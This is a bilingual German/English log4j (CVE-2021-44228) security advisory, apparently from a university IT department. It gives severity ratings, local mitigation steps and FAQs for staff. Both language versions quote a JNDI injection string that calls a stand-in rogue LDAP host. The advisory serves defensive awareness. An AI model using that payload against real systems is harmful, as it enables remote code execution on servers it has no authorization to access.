Cybersicherheitswarnung "log4j" (CVE-2021-44228)
- Dino Dukic Admin
- Carina Fellner
This information is available in German and English.
🇦🇹 Deutsche Version | 🇬🇧 English Version
Öffentliche Informationen zertifizierter Stellen
Das deutsche BSI (=Bundesamt für Sicherheit in der Informationstechnik) informiert über >> aktuelle Cyber-Sicherheitswarnungen inkl. Bewertung der Bedrohungsstufe.
Das Dossier zur kritischen Schwachstelle in log4j kann in der aktuellsten Version vom BSI bezogen werden.
Technische Informationen, die auch regelmäßig aktualisiert werden, bietet die Warnung des österreichischen CERT: https://cert.at/de/warnungen/2021/12/kritische-0-day-sicherheitslucke-in-apache-log4j-bibliothek
Stand 13.12.2021
Grad der Ausnutzung | einfach |
|---|---|
Anzahl betroffener Dienste | hoch |
Aktuelle Angriffe | ja |
Offizielle Einstufung | Sehr Kritisch |
Aktuelle Maßnahmen an der WU
Services mit log4j identifizieren
Patchen und mitigieren der Schwachstelle auf allen betroffenen Services
Betrieb von Services einstellen, die nicht mehr benötigt werden
Netzwerke segmentieren und Services isolieren
Bei Servern im WU-Netz: Freischalten aller Ports für den Schwachstellenscanner (Host IP 137.208.11.15)
Wenn Sie dezentrale IT-Dienste verwalten, kontaktieren Sie bitte hotline@wu.ac.at, um weitere Maßnahmen zu koordinieren.
Was ist das Problem mit "log4j"?
Es gibt eine Sicherheitslücke in einer Komponente von Java: log4j. Die Komponente log4j wird für Logging verwendet. Die Daten, die gelogged werden sollen, werden nicht korrekt geprüft. Log4j kann daher benutzt werden, beliebigen Schadcode auszuführen.
Wie schwierig ist es, die Lücke auszunutzen?
Extrem einfach. Es reicht oft, diesen String in ein Login-Feld einzugeben:
${jndi:ldap://rogueldapserver.com/a}Welche Services sind betroffen?
Jede Applikation die log4j verwendet, kann davon betroffen sein. Das trifft nicht nur Webserver.
Aufgrund der weiten Verbreitung der Bibliothek ist es nur schwer absehbar, welche Produkte alle betroffen sind.
Wird die Schwachstelle bereits ausgenutzt?
Ja. Weltweit werden massive Wellen an Angriffen beobachtet. Es ist nicht auszuschließen, dass die WU ebenfalls betroffen ist.
Wie schwerwiegend ist das Problem?
Extrem schwerwiegend. Das BSI hat die IT-Bedrohungslage auf 4/ROT gestuft.
Einstufung | Erläuterung |
|---|---|
1 | GRAU | Die IT-Bedrohungslage ist ohne wesentliche Auffälligkeiten auf anhaltend hohem Niveau. |
2 | GELB | IT-Bedrohungslage mit verstärkter Beobachtung von Auffälligkeiten unter temporärer Beeinträchtigung des Regelbetriebs. |
3 | ORANGE | Die IT-Bedrohungslage ist geschäftskritisch. Massive Beeinträchtigung des Regelbetriebs. |
4 | ROT | Die IT-Bedrohungslage ist extrem kritisch. Ausfall vieler Dienste, der Regelbetrieb kann nicht aufrecht erhalten werden. |
Sind nur von außen erreichbare Services in Gefahr?
Nein. Auch interne Dienste sind gefährdet, da die Daten durchgereicht werden können.
Sind Server sicher, die nicht ins Internet dürfen?
Nein. Es sind Ausnutzungen der Schwachstelle zu beobachten, die kein explizites Nachladen eines Schadcodes benötigen und einen maliziösen Code direkt in der Abfrage enthalten. Dies gefährdet auch Grundschutz-konforme Systeme, die i.d.R. keine Verbindung ins Internet aufbauen können.
Updated December 13, 2021
Exploitability | EASY |
|---|---|
Number of affected services | HIGH |
Current attacks | YES |
Classification | Highly Critical |
What is the problem with "log4j"?
There is a security vulnerability in a component of Java: log4j. The log4j component is used for logging. But the data that should be logged is not checked correctly. Log4j can therefore be used to execute arbitrary malicious code.
How difficult is exploiting the vulnerability?
Very easy. In most cases, the following string put in an entry field means harm:
${jndi:ldap://rogueldapserver.com/a}Which services are affected?
Every application using log4j can be affected. This is not limited to webservers.
Because log4j is widely used, it is very difficult to assess which services or software are vulnerable.
Is the vulnerability already being exploited?
Yes. Waves of attacks are being observed worldwide. It cannot be ruled out that WU is also affected.
Are only externally accessible services at risk?
No. Because data can be relayed to internal services, they are also at risk.
Are servers secure, which are not allowed to access the Internet?
No. Some exploits contain malicious code directly in the query and do not require loading explicit malicious code from other sources. That also endangers systems compliant with IT Baseline Protection which usually cannot connect to the Internet.